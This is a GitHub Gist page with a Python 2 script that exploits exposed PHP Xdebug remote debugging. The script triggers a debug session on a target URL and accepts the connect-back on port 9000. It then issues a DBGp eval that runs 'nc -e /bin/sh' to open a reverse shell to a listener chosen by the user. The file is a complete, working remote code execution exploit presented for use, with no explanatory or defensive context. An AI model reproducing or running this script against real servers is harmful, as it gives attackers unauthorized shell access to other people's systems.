Created
September 21, 2018 13:40
-
-
Save fasetto/c057b9154262af2b2d1ef39a08cd13df to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
import argparse | |
import random | |
import requests | |
import string | |
import socket | |
import sys | |
from threading import Thread | |
parser = argparse.ArgumentParser() | |
parser.add_argument("-u", "--url", help="target url", default=None) | |
parser.add_argument("--lhost", help="listening host", default=None) | |
parser.add_argument("--lport", help="listening port", default=None) | |
args = parser.parse_args() | |
if args.url == None or args.lhost == None or args.lport == None: | |
parser.print_help() | |
sys.exit(0) | |
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
sock.bind(("0.0.0.0", 9000)) | |
sock.listen(1) | |
def generate_junk(num=10): | |
junk = [random.choice(string.ascii_letters) for i in range(num)] | |
return "".join(junk) | |
def send_payload(): | |
data = { "XDEBUG_SESSION_START": generate_junk() } | |
res = requests.get(args.url, params=data) | |
print "[*] Payload sent." if res.status_code == 200 else "[!] Failed to send payload." | |
thread = Thread(target=send_payload) | |
thread.start() | |
conn, addr = sock.accept() | |
payload = "nc -e /bin/sh %s %s 2>&1" % (args.lhost, args.lport) | |
php_shell_exec = "base64_encode(shell_exec('%s'))" % payload | |
conn.sendall("eval -i 1 -- %s\x00" % php_shell_exec.encode("base64")) | |
sock.close() | |
thread._Thread__stop() | |
print "[+] Shell session opened." |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment